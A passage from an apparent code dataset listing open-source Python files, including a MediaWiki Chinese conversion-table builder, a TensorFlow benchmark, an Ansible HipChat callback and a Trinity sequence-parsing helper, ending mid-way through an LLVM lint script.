repo_name (stringlengths 5-100) | path (stringlengths 4-375) | copies (stringclasses, 991 values) | size (stringlengths 4-7) | content (stringlengths 666-1M) | license (stringclasses, 15 values) |
---|---|---|---|---|---|
yuanzhao/gpdb | src/test/tinc/tincrepo/mpp/lib/mpp_tl.py | 12 | 1154 | """
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models.mpp_tc import _MPPMetaClassType
class MPPTestLib(object):
# MPPTestLib class is of type MPPMetaClassType
# MPPMetaClassType will take care of reconfiguring the bases of all the derived classes that have product-specific hidden libraries
__metaclass__ = _MPPMetaClassType
def __init__(self):
self.make_me_product_agnostic()
super(MPPTestLib, self).__init__()
class __gpdbMPPTestLib__(MPPTestLib):
pass
class __hawqMPPTestLib__(MPPTestLib):
pass
| apache-2.0 |
ryanolson/couchdb-python | perftest.py | 7 | 1440 | """
Simple performance tests.
"""
import sys
import time
import couchdb
def main():
print 'sys.version : %r' % (sys.version,)
print 'sys.platform : %r' % (sys.platform,)
tests = [create_doc, create_bulk_docs]
if len(sys.argv) > 1:
tests = [test for test in tests if test.__name__ in sys.argv[1:]]
server = couchdb.Server()
for test in tests:
_run(server, test)
def _run(server, func):
"""Run a test in a clean db and log its execution time."""
sys.stdout.write("* [%s] %s ... " % (func.__name__, func.__doc__.strip()))
sys.stdout.flush()
db_name = 'couchdb-python/perftest'
db = server.create(db_name)
try:
try:
start = time.time()
func(db)
stop = time.time()
sys.stdout.write("%0.2fs\n" % (stop - start,))
sys.stdout.flush()
except Exception, e:
sys.stdout.write("FAILED - %r\n" % (unicode(e),))
sys.stdout.flush()
finally:
server.delete(db_name)
def create_doc(db):
"""Create lots of docs, one at a time"""
for i in range(1000):
db.save({'_id': unicode(i)})
def create_bulk_docs(db):
"""Create lots of docs, lots at a time"""
batch_size = 100
num_batches = 1000
for i in range(num_batches):
db.update([{'_id': unicode((i * batch_size) + j)} for j in range(batch_size)])
if __name__ == '__main__':
main()
| bsd-3-clause |
kunalgrover05/Mediawiki-pagelang | maintenance/language/zhtable/Makefile.py | 63 | 14541 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author Philip
import tarfile as tf
import zipfile as zf
import os, re, shutil, sys, platform
pyversion = platform.python_version()
islinux = platform.system().lower() == 'linux'
if pyversion[:3] in ['2.6', '2.7']:
import urllib as urllib_request
import codecs
open = codecs.open
_unichr = unichr
if sys.maxunicode < 0x10000:
def unichr(i):
if i < 0x10000:
return _unichr(i)
else:
return _unichr( 0xD7C0 + ( i>>10 ) ) + _unichr( 0xDC00 + ( i & 0x3FF ) )
elif pyversion[:2] == '3.':
import urllib.request as urllib_request
unichr = chr
def unichr2( *args ):
return [unichr( int( i.split('<')[0][2:], 16 ) ) for i in args]
def unichr3( *args ):
return [unichr( int( i[2:7], 16 ) ) for i in args if i[2:7]]
# DEFINE
UNIHAN_VER = '6.3.0'
SF_MIRROR = 'dfn'
SCIM_TABLES_VER = '0.5.13'
SCIM_PINYIN_VER = '0.5.92'
LIBTABE_VER = '0.2.3'
# END OF DEFINE
def download( url, dest ):
if os.path.isfile( dest ):
print( 'File %s is up to date.' % dest )
return
global islinux
if islinux:
# we use wget instead of urlretrieve under Linux,
# because wget displays details like download progress
os.system( 'wget %s -O %s' % ( url, dest ) )
else:
print( 'Downloading from [%s] ...' % url )
urllib_request.urlretrieve( url, dest )
print( 'Download complete.\n' )
return
def uncompress( fp, member, encoding = 'U8' ):
name = member.rsplit( '/', 1 )[-1]
print( 'Extracting %s ...' % name )
fp.extract( member )
shutil.move( member, name )
if '/' in member:
shutil.rmtree( member.split( '/', 1 )[0] )
if pyversion[:1] in ['2']:
fc = open( name, 'rb', encoding, 'ignore' )
else:
fc = open( name, 'r', encoding = encoding, errors = 'ignore' )
return fc
unzip = lambda path, member, encoding = 'U8': \
uncompress( zf.ZipFile( path ), member, encoding )
untargz = lambda path, member, encoding = 'U8': \
uncompress( tf.open( path, 'r:gz' ), member, encoding )
def parserCore( fp, pos, beginmark = None, endmark = None ):
if beginmark and endmark:
start = False
else: start = True
mlist = set()
for line in fp:
if beginmark and line.startswith( beginmark ):
start = True
continue
elif endmark and line.startswith( endmark ):
break
if start and not line.startswith( '#' ):
elems = line.split()
if len( elems ) < 2:
continue
elif len( elems[0] ) > 1 and \
len( elems[pos] ) > 1: # words only
mlist.add( elems[pos] )
return mlist
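# Illustrative sketch (not part of the original script): with
# beginmark = 'BEGIN_TABLE' and endmark = 'END_TABLE', parserCore collects
# column `pos` from every data line between the two markers; e.g. with
# pos = 1, a line "ni 你好 500" contributes '你好' to the returned set, while
# '#' comment lines and single-character entries are skipped.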
def tablesParser( path, name ):
""" Read file from scim-tables and parse it. """
global SCIM_TABLES_VER
src = 'scim-tables-%s/tables/zh/%s' % ( SCIM_TABLES_VER, name )
fp = untargz( path, src, 'U8' )
return parserCore( fp, 1, 'BEGIN_TABLE', 'END_TABLE' )
ezbigParser = lambda path: tablesParser( path, 'EZ-Big.txt.in' )
wubiParser = lambda path: tablesParser( path, 'Wubi.txt.in' )
zrmParser = lambda path: tablesParser( path, 'Ziranma.txt.in' )
def phraseParser( path ):
""" Read phrase_lib.txt and parse it. """
global SCIM_PINYIN_VER
src = 'scim-pinyin-%s/data/phrase_lib.txt' % SCIM_PINYIN_VER
dst = 'phrase_lib.txt'
fp = untargz( path, src, 'U8' )
return parserCore( fp, 0 )
def tsiParser( path ):
""" Read tsi.src and parse it. """
src = 'libtabe/tsi-src/tsi.src'
dst = 'tsi.src'
fp = untargz( path, src, 'big5hkscs' )
return parserCore( fp, 0 )
def unihanParser( path ):
""" Read Unihan_Variants.txt and parse it. """
fp = unzip( path, 'Unihan_Variants.txt', 'U8' )
t2s = dict()
s2t = dict()
for line in fp:
if line.startswith( '#' ):
continue
else:
elems = line.split()
if len( elems ) < 3:
continue
type = elems.pop( 1 )
elems = unichr2( *elems )
if type == 'kTraditionalVariant':
s2t[elems[0]] = elems[1:]
elif type == 'kSimplifiedVariant':
t2s[elems[0]] = elems[1:]
fp.close()
return ( t2s, s2t )
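# Illustrative sketch (not part of the original script): a Unihan_Variants.txt
# line like "U+4E91 kTraditionalVariant U+96F2" yields s2t[u'云'] == [u'雲'],
# while "U+96F2 kSimplifiedVariant U+4E91" yields t2s[u'雲'] == [u'云'].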
def applyExcludes( mlist, path ):
""" Apply exclude rules from path to mlist. """
if pyversion[:1] in ['2']:
excludes = open( path, 'rb', 'U8' ).read().split()
else:
excludes = open( path, 'r', encoding = 'U8' ).read().split()
excludes = [word.split( '#' )[0].strip() for word in excludes]
excludes = '|'.join( excludes )
excptn = re.compile( '.*(?:%s).*' % excludes )
diff = [mword for mword in mlist if excptn.search( mword )]
mlist.difference_update( diff )
return mlist
def charManualTable( path ):
fp = open( path, 'r', encoding = 'U8' )
ret = {}
for line in fp:
elems = line.split( '#' )[0].split( '|' )
elems = unichr3( *elems )
if len( elems ) > 1:
ret[elems[0]] = elems[1:]
return ret
def toManyRules( src_table ):
tomany = set()
if pyversion[:1] in ['2']:
for ( f, t ) in src_table.iteritems():
for i in range( 1, len( t ) ):
tomany.add( t[i] )
else:
for ( f, t ) in src_table.items():
for i in range( 1, len( t ) ):
tomany.add( t[i] )
return tomany
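# Illustrative example (not part of the original script): with the one-to-many
# mapping {u'发': [u'發', u'髮']}, toManyRules returns {u'髮'}; only the variants
# beyond the first (the default one-to-one choice) are collected.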
def removeRules( path, table ):
fp = open( path, 'r', encoding = 'U8' )
texc = list()
for line in fp:
elems = line.split( '=>' )
f = t = elems[0].strip()
if len( elems ) == 2:
t = elems[1].strip()
f = f.strip('"').strip("'")
t = t.strip('"').strip("'")
if f:
try:
table.pop( f )
except:
pass
if t:
texc.append( t )
texcptn = re.compile( '^(?:%s)$' % '|'.join( texc ) )
if pyversion[:1] in ['2']:
for (tmp_f, tmp_t) in table.copy().iteritems():
if texcptn.match( tmp_t ):
table.pop( tmp_f )
else:
for (tmp_f, tmp_t) in table.copy().items():
if texcptn.match( tmp_t ):
table.pop( tmp_f )
return table
def customRules( path ):
fp = open( path, 'r', encoding = 'U8' )
ret = dict()
for line in fp:
elems = line.split( '#' )[0].split()
if len( elems ) > 1:
ret[elems[0]] = elems[1]
return ret
def dictToSortedList( src_table, pos ):
return sorted( src_table.items(), key = lambda m: m[pos] )
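# Illustrative example (not part of the original script):
# dictToSortedList( {'b': 'a', 'a': 'c'}, 0 ) returns [('a', 'c'), ('b', 'a')]
# (sorted by source); pos = 1 sorts the same pairs by target instead.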
def translate( text, conv_table ):
i = 0
while i < len( text ):
for j in range( len( text ) - i, 0, -1 ):
f = text[i:][:j]
t = conv_table.get( f )
if t:
text = text[:i] + t + text[i:][j:]
i += len(t) - 1
break
i += 1
return text
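# Worked example (illustrative, not part of the original script): translate()
# performs greedy longest-match substitution, so with
# conv_table = {'ab': 'X', 'b': 'Y'} the call translate('abb', conv_table)
# first rewrites 'ab' -> 'X' and then 'b' -> 'Y', returning 'XY'; after each
# hit, i is advanced past the inserted replacement so it is never re-scanned.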
def manualWordsTable( path, conv_table, reconv_table ):
fp = open( path, 'r', encoding = 'U8' )
reconv_table = {}
wordlist = [line.split( '#' )[0].strip() for line in fp]
wordlist = list( set( wordlist ) )
wordlist.sort( key = len, reverse = True )
while wordlist:
word = wordlist.pop()
new_word = translate( word, conv_table )
rcv_word = translate( word, reconv_table )
if word != rcv_word:
reconv_table[word] = word
reconv_table[new_word] = word
return reconv_table
def defaultWordsTable( src_wordlist, src_tomany, char_conv_table, char_reconv_table ):
wordlist = list( src_wordlist )
wordlist.sort( key = len, reverse = True )
word_conv_table = {}
word_reconv_table = {}
conv_table = char_conv_table.copy()
reconv_table = char_reconv_table.copy()
tomanyptn = re.compile( '(?:%s)' % '|'.join( src_tomany ) )
while wordlist:
conv_table.update( word_conv_table )
reconv_table.update( word_reconv_table )
word = wordlist.pop()
new_word_len = word_len = len( word )
while new_word_len == word_len:
add = False
test_word = translate( word, reconv_table )
new_word = translate( word, conv_table )
if not reconv_table.get( new_word ) \
and ( test_word != word \
or ( tomanyptn.search( word ) \
and word != translate( new_word, reconv_table ) ) ):
word_conv_table[word] = new_word
word_reconv_table[new_word] = word
try:
word = wordlist.pop()
except IndexError:
break
new_word_len = len(word)
return word_reconv_table
def PHPArray( table ):
lines = ['\'%s\' => \'%s\',' % (f, t) for (f, t) in table if f and t]
return '\n'.join(lines)
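# Illustrative example (not part of the original script):
# PHPArray( [(u'云', u'雲'), (u'', u'x')] ) returns "'云' => '雲',"; pairs with
# an empty source or target are dropped.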
def main():
#Get Unihan.zip:
url = 'http://www.unicode.org/Public/%s/ucd/Unihan.zip' % UNIHAN_VER
han_dest = 'Unihan.zip'
download( url, han_dest )
# Get scim-tables-$(SCIM_TABLES_VER).tar.gz:
url = 'http://%s.dl.sourceforge.net/sourceforge/scim/scim-tables-%s.tar.gz' % ( SF_MIRROR, SCIM_TABLES_VER )
tbe_dest = 'scim-tables-%s.tar.gz' % SCIM_TABLES_VER
download( url, tbe_dest )
# Get scim-pinyin-$(SCIM_PINYIN_VER).tar.gz:
url = 'http://%s.dl.sourceforge.net/sourceforge/scim/scim-pinyin-%s.tar.gz' % ( SF_MIRROR, SCIM_PINYIN_VER )
pyn_dest = 'scim-pinyin-%s.tar.gz' % SCIM_PINYIN_VER
download( url, pyn_dest )
# Get libtabe-$(LIBTABE_VER).tgz:
url = 'http://%s.dl.sourceforge.net/sourceforge/libtabe/libtabe-%s.tgz' % ( SF_MIRROR, LIBTABE_VER )
lbt_dest = 'libtabe-%s.tgz' % LIBTABE_VER
download( url, lbt_dest )
# Unihan.txt
( t2s_1tomany, s2t_1tomany ) = unihanParser( han_dest )
t2s_1tomany.update( charManualTable( 'trad2simp.manual' ) )
s2t_1tomany.update( charManualTable( 'simp2trad.manual' ) )
if pyversion[:1] in ['2']:
t2s_1to1 = dict( [( f, t[0] ) for ( f, t ) in t2s_1tomany.iteritems()] )
s2t_1to1 = dict( [( f, t[0] ) for ( f, t ) in s2t_1tomany.iteritems()] )
else:
t2s_1to1 = dict( [( f, t[0] ) for ( f, t ) in t2s_1tomany.items()] )
s2t_1to1 = dict( [( f, t[0] ) for ( f, t ) in s2t_1tomany.items()] )
s_tomany = toManyRules( t2s_1tomany )
t_tomany = toManyRules( s2t_1tomany )
# noconvert rules
t2s_1to1 = removeRules( 'trad2simp_noconvert.manual', t2s_1to1 )
s2t_1to1 = removeRules( 'simp2trad_noconvert.manual', s2t_1to1 )
# the super set for word-to-word conversion
t2s_1to1_supp = t2s_1to1.copy()
s2t_1to1_supp = s2t_1to1.copy()
t2s_1to1_supp.update( customRules( 'trad2simp_supp_set.manual' ) )
s2t_1to1_supp.update( customRules( 'simp2trad_supp_set.manual' ) )
# word to word manual rules
t2s_word2word_manual = manualWordsTable( 'simpphrases.manual', s2t_1to1_supp, t2s_1to1_supp )
t2s_word2word_manual.update( customRules( 'toSimp.manual' ) )
s2t_word2word_manual = manualWordsTable( 'tradphrases.manual', t2s_1to1_supp, s2t_1to1_supp )
s2t_word2word_manual.update( customRules( 'toTrad.manual' ) )
# word to word rules from input methods
t_wordlist = set()
s_wordlist = set()
t_wordlist.update( ezbigParser( tbe_dest ),
tsiParser( lbt_dest ) )
s_wordlist.update( wubiParser( tbe_dest ),
zrmParser( tbe_dest ),
phraseParser( pyn_dest ) )
# exclude
s_wordlist = applyExcludes( s_wordlist, 'simpphrases_exclude.manual' )
t_wordlist = applyExcludes( t_wordlist, 'tradphrases_exclude.manual' )
s2t_supp = s2t_1to1_supp.copy()
s2t_supp.update( s2t_word2word_manual )
t2s_supp = t2s_1to1_supp.copy()
t2s_supp.update( t2s_word2word_manual )
# parse list to dict
t2s_word2word = defaultWordsTable( s_wordlist, s_tomany, s2t_1to1_supp, t2s_supp )
t2s_word2word.update( t2s_word2word_manual )
s2t_word2word = defaultWordsTable( t_wordlist, t_tomany, t2s_1to1_supp, s2t_supp )
s2t_word2word.update( s2t_word2word_manual )
# Final tables
# sorted list toHans
if pyversion[:1] in ['2']:
t2s_1to1 = dict( [( f, t ) for ( f, t ) in t2s_1to1.iteritems() if f != t] )
else:
t2s_1to1 = dict( [( f, t ) for ( f, t ) in t2s_1to1.items() if f != t] )
toHans = dictToSortedList( t2s_1to1, 0 ) + dictToSortedList( t2s_word2word, 1 )
# sorted list toHant
if pyversion[:1] in ['2']:
s2t_1to1 = dict( [( f, t ) for ( f, t ) in s2t_1to1.iteritems() if f != t] )
else:
s2t_1to1 = dict( [( f, t ) for ( f, t ) in s2t_1to1.items() if f != t] )
toHant = dictToSortedList( s2t_1to1, 0 ) + dictToSortedList( s2t_word2word, 1 )
# sorted list toCN
toCN = dictToSortedList( customRules( 'toCN.manual' ), 1 )
# sorted list toHK
toHK = dictToSortedList( customRules( 'toHK.manual' ), 1 )
# sorted list toSG
toSG = dictToSortedList( customRules( 'toSG.manual' ), 1 )
# sorted list toTW
toTW = dictToSortedList( customRules( 'toTW.manual' ), 1 )
# Get PHP Array
php = '''<?php
/**
* Simplified / Traditional Chinese conversion tables
*
* Automatically generated using code and data in maintenance/language/zhtable/
* Do not modify directly!
*
* @file
*/
$zh2Hant = array(\n'''
php += PHPArray( toHant ) \
+ '\n);\n\n$zh2Hans = array(\n' \
+ PHPArray( toHans ) \
+ '\n);\n\n$zh2TW = array(\n' \
+ PHPArray( toTW ) \
+ '\n);\n\n$zh2HK = array(\n' \
+ PHPArray( toHK ) \
+ '\n);\n\n$zh2CN = array(\n' \
+ PHPArray( toCN ) \
+ '\n);\n\n$zh2SG = array(\n' \
+ PHPArray( toSG ) \
+ '\n);\n'
if pyversion[:1] in ['2']:
f = open( os.path.join( '..', '..', '..', 'includes', 'ZhConversion.php' ), 'wb', encoding = 'utf8' )
else:
f = open( os.path.join( '..', '..', '..', 'includes', 'ZhConversion.php' ), 'w', buffering = 4096, encoding = 'utf8' )
print ('Writing ZhConversion.php ... ')
f.write( php )
f.close()
# Remove temporary files
print ('Deleting temporary files ... ')
os.remove('EZ-Big.txt.in')
os.remove('phrase_lib.txt')
os.remove('tsi.src')
os.remove('Unihan_Variants.txt')
os.remove('Wubi.txt.in')
os.remove('Ziranma.txt.in')
if __name__ == '__main__':
main()
| gpl-2.0 |
with-git/tensorflow | tensorflow/python/eager/benchmarks_test.py | 5 | 4874 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmarks for low-level eager execution primitives.
Packaged as a test to ensure that this code is exercised by continuous
integration tests. To get numbers:
bazel build -c opt :benchmarks_test &&
./bazel-bin/tensorflow/python/eager/benchmarks_test --iters=0
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import contextlib
import sys
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import backprop # pylint: disable=unused-import
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import tensor
from tensorflow.python.eager import test
from tensorflow.python.framework import test_util
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
FLAGS = None
@contextlib.contextmanager
def timer(label, iters=30000):
start = time.time()
yield xrange(iters)
end = time.time()
t = (end - start) * 1e6 / iters
print("%-40s took %.2fus (%d iterations)" % (label, t, iters))
def benchmark_create_tensor(n):
"""Benchmark overheads of creating a Tensor object."""
def label(s):
return "{:20s}".format(s)
with timer(label("np.array([[3]])"), iters=n) as iters:
for _ in iters:
np.array([[3]])
with timer(label("Tensor([[3]])"), iters=n) as iters:
for _ in iters:
tensor.Tensor([[3]])
def benchmark_matmul(shape, n, use_gpu=False):
"""Benchmark for matrix multiplication using tf.matmul."""
transpose_b = (shape[0] != shape[1])
m = random_ops.random_uniform(shape)
if use_gpu:
m = m.as_gpu_tensor()
# Warm up the GPU - the very first kernel invocation
# seems to require a bunch of setup.
math_ops.matmul(m, m, transpose_b=transpose_b)
def label(s):
return "MatMul {}: {:30s}".format(shape, s)
if not use_gpu:
a = m.as_cpu_tensor().numpy()
b = a.T if transpose_b else a
with timer(label("np.dot"), iters=n) as iters:
for _ in iters:
np.dot(a, b)
with timer(label("tf.matmul"), iters=n) as iters:
for _ in iters:
math_ops.matmul(m, m, transpose_b=transpose_b)
with timer(label("gen_math_ops.mat_mul"), iters=n) as iters:
for _ in iters:
gen_math_ops._mat_mul(m, m, transpose_b=transpose_b)
# pylint: disable=protected-access
input_handles = [m._handle, m._handle]
ctx_handle = context.context()._handle
# pylint: enable=protected-access
attrs = ("transpose_a", False, "transpose_b", transpose_b, "T",
m.dtype.as_datatype_enum)
with timer(label("TFE_Py_Execute"), iters=n) as iters:
for _ in iters:
pywrap_tensorflow.TFE_DeleteTensorHandle(
pywrap_tensorflow.TFE_Py_Execute(ctx_handle, None, "MatMul",
input_handles, attrs, 1)[0])
f = function.defun(math_ops.matmul)
with timer(label("defun(tf.matmul)"), iters=n) as iters:
for _ in iters:
f(m, m, transpose_b=transpose_b)
class BenchmarksTest(test_util.TensorFlowTestCase):
def testBenchmarks(self):
# This isn't actually a test, but benchmarks packaged as a test
# so that continuous integration runs catch any breakages.
print(context.context())
benchmark_create_tensor(FLAGS.iters or 30000)
benchmark_matmul([2, 2], FLAGS.iters or 30000)
benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000)
if context.context().num_gpus() > 0:
print("---- RUNNING ON GPU NOW ----")
benchmark_matmul([2, 2], FLAGS.iters or 30000, use_gpu=True)
benchmark_matmul([100, 28 * 28], FLAGS.iters or 1000, use_gpu=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Default iterations to 1 to keep continuous integration test times low.
parser.add_argument(
"--iters",
type=int,
default=1,
help="Number of iterators for each test. None or 0 for auto-selection")
FLAGS, unparsed = parser.parse_known_args()
sys.argv = [sys.argv[0]] + unparsed
test.main()
| apache-2.0 |
rest-of/the-deck | lambda/lib/python2.7/site-packages/pip/_vendor/progress/counter.py | 510 | 1502 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Giorgos Verigakis <[email protected]>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from . import Infinite, Progress
from .helpers import WriteMixin
class Counter(WriteMixin, Infinite):
message = ''
hide_cursor = True
def update(self):
self.write(str(self.index))
class Countdown(WriteMixin, Progress):
hide_cursor = True
def update(self):
self.write(str(self.remaining))
class Stack(WriteMixin, Progress):
phases = (u' ', u'▁', u'▂', u'▃', u'▄', u'▅', u'▆', u'▇', u'█')
hide_cursor = True
def update(self):
nphases = len(self.phases)
i = min(nphases - 1, int(self.progress * nphases))
self.write(self.phases[i])
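# Worked example (illustrative, not part of the original module): with the
# nine Stack phases above and self.progress == 0.5, the index is
# min(8, int(0.5 * 9)) == 4, so the half-height block u'▄' is written.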
class Pie(Stack):
phases = (u'○', u'◔', u'◑', u'◕', u'●')
| mit |
hzy001/ansible | lib/ansible/plugins/callback/hipchat.py | 101 | 5867 | # (C) 2014, Matt Martz <[email protected]>
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import os
import urllib
import urllib2
try:
import prettytable
HAS_PRETTYTABLE = True
except ImportError:
HAS_PRETTYTABLE = False
from ansible.plugins.callback import CallbackBase
class CallbackModule(CallbackBase):
"""This is an example ansible callback plugin that sends status
updates to a HipChat channel during playbook execution.
This plugin makes use of the following environment variables:
HIPCHAT_TOKEN (required): HipChat API token
HIPCHAT_ROOM (optional): HipChat room to post in. Default: ansible
HIPCHAT_FROM (optional): Name to post as. Default: ansible
HIPCHAT_NOTIFY (optional): Add notify flag to important messages ("true" or "false"). Default: true
Requires:
prettytable
"""
CALLBACK_VERSION = 2.0
CALLBACK_NAME = 'hipchat'
def __init__(self, display):
super(CallbackModule, self).__init__(display)
if not HAS_PRETTYTABLE:
self.disabled = True
self.display.warning('The `prettytable` python module is not installed. '
'Disabling the HipChat callback plugin.')
self.msg_uri = 'https://api.hipchat.com/v1/rooms/message'
self.token = os.getenv('HIPCHAT_TOKEN')
self.room = os.getenv('HIPCHAT_ROOM', 'ansible')
self.from_name = os.getenv('HIPCHAT_FROM', 'ansible')
self.allow_notify = (os.getenv('HIPCHAT_NOTIFY') != 'false')
if self.token is None:
self.disabled = True
self.display.warning('HipChat token could not be loaded. The HipChat '
'token can be provided using the `HIPCHAT_TOKEN` '
'environment variable.')
self.printed_playbook = False
self.playbook_name = None
def send_msg(self, msg, msg_format='text', color='yellow', notify=False):
"""Method for sending a message to HipChat"""
params = {}
params['room_id'] = self.room
params['from'] = self.from_name[:15] # max length is 15
params['message'] = msg
params['message_format'] = msg_format
params['color'] = color
params['notify'] = int(self.allow_notify and notify)
url = ('%s?auth_token=%s' % (self.msg_uri, self.token))
try:
response = urllib2.urlopen(url, urllib.urlencode(params))
return response.read()
except:
self.display.warning('Could not submit message to hipchat')
def playbook_on_play_start(self, name):
"""Display Playbook and play start messages"""
# This block sends information about a playbook when it starts
# The playbook object is not immediately available at
# playbook_on_start so we grab it via the play
#
# Displays info about playbook being started by a person on an
# inventory, as well as Tags, Skip Tags and Limits
if not self.printed_playbook:
self.playbook_name, _ = os.path.splitext(
os.path.basename(self.play.playbook.filename))
host_list = self.play.playbook.inventory.host_list
inventory = os.path.basename(os.path.realpath(host_list))
self.send_msg("%s: Playbook initiated by %s against %s" %
(self.playbook_name,
self.play.playbook.remote_user,
inventory), notify=True)
self.printed_playbook = True
subset = self.play.playbook.inventory._subset
skip_tags = self.play.playbook.skip_tags
self.send_msg("%s:\nTags: %s\nSkip Tags: %s\nLimit: %s" %
(self.playbook_name,
', '.join(self.play.playbook.only_tags),
', '.join(skip_tags) if skip_tags else None,
', '.join(subset) if subset else subset))
# This is where we actually say we are starting a play
self.send_msg("%s: Starting play: %s" %
(self.playbook_name, name))
def playbook_on_stats(self, stats):
"""Display info about playbook statistics"""
hosts = sorted(stats.processed.keys())
t = prettytable.PrettyTable(['Host', 'Ok', 'Changed', 'Unreachable',
'Failures'])
failures = False
unreachable = False
for h in hosts:
s = stats.summarize(h)
if s['failures'] > 0:
failures = True
if s['unreachable'] > 0:
unreachable = True
t.add_row([h] + [s[k] for k in ['ok', 'changed', 'unreachable',
'failures']])
self.send_msg("%s: Playbook complete" % self.playbook_name,
notify=True)
if failures or unreachable:
color = 'red'
self.send_msg("%s: Failures detected" % self.playbook_name,
color=color, notify=True)
else:
color = 'green'
self.send_msg("/code %s:\n%s" % (self.playbook_name, t), color=color)
| gpl-3.0 |
tianyang-li/de-novo-rna-seq-quant-1 | util/trinity_0.py | 1 | 3040 | #!/usr/bin/env python
# Copyright (C) 2012 Tianyang Li
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
handles Trinity's output
"""
from __future__ import division
from collections import defaultdict
import re
from Bio import SeqIO
from fasta_0 import FastaSeq
class TrinityContig(FastaSeq):
__slots__ = ['nodes']
def __init__(self, rec_id, seq, nodes):
"""
nodes
a list of
(node, low, high)
describing nodes in splice graph
"""
super(TrinityContig, self).__init__(rec_id, seq)
self.nodes = nodes
def find_start(self, start):
"""
find the node a psl.tStart is in
it is assumed that _start_ can always
find a node to fit in
"""
l = 0
h = len(self.nodes) - 1
x = int((l + h) / 2)
while (start < self.nodes[x][1]
or start >= self.nodes[x][2]):
if start < self.nodes[x][1]:
h = x - 1
else:
l = x + 1
x = int((l + h) / 2)
return x
def find_end(self, end):
"""
find the node a psl.tEnd is in
it is assumed that _end_ can always find
a node to fit in
"""
l = 0
h = len(self.nodes) - 1
x = int((l + h) / 2)
while (end <= self.nodes[x][1]
or end > self.nodes[x][2]):
if end <= self.nodes[x][1]:
h = x - 1
else:
l = x + 1
x = int((l + h) / 2)
return x
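# Worked example (illustrative, not part of the original module): with
# nodes = [('n0', 0, 5), ('n1', 5, 9)], find_start(6) returns 1 because 6
# falls in the half-open interval [5, 9), while find_end(5) returns 0 because
# 5 is the exclusive end of [0, 5).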
path_re = re.compile(r'path=\[(.*)\]')
node_re = re.compile(r'(\w*):(\d*)-(\d*)')
def convert_node_re(n):
return (n[0], int(n[1]), int(n[2]) + 1)
def get_contig_nodes(rec_description):
global path_re, node_re
nodes = path_re.search(rec_description).group(1).split(" ")
return map(lambda n: convert_node_re(node_re.search(n).groups()), nodes)
def get_contig_dict(trinity_out_file):
"""
return a defaultdict(dict)
where
contig_dict[graph][contig]
is _contig_ from _graph_
"""
contig_dict = defaultdict(dict)
for rec in SeqIO.parse(trinity_out_file, 'fasta'):
rec_id = rec.id
contig_dict[rec_id.split("_")[0]][rec_id] = TrinityContig(rec_id, str(rec.seq), get_contig_nodes(rec.description))
return contig_dict
| gpl-3.0 |
sawenzel/root | interpreter/llvm/src/utils/lint/common_lint.py | 147 | 2589 | #!/usr/bin/python
#
# Common lint functions applicable to multiple types of files.
import re
def VerifyLineLength(filename, lines, max_length):
"""Checks to make sure the file has no lines with lines exceeding the length
limit.
Args:
filename: the file under consideration as string
lines: contents of the file as string array
max_length: maximum acceptable line length as number
Returns:
A list of tuples with format [(filename, line number, msg), ...] with any
violations found.
"""
lint = []
line_num = 1
for line in lines:
length = len(line.rstrip('\n'))
if length > max_length:
lint.append((filename, line_num,
'Line exceeds %d chars (%d)' % (max_length, length)))
line_num += 1
return lint
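# Example (illustrative, not part of the original linter):
# VerifyLineLength('f.c', ['short\n', 'x' * 90 + '\n'], 80) returns
# [('f.c', 2, 'Line exceeds 80 chars (90)')].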
def VerifyTabs(filename, lines):
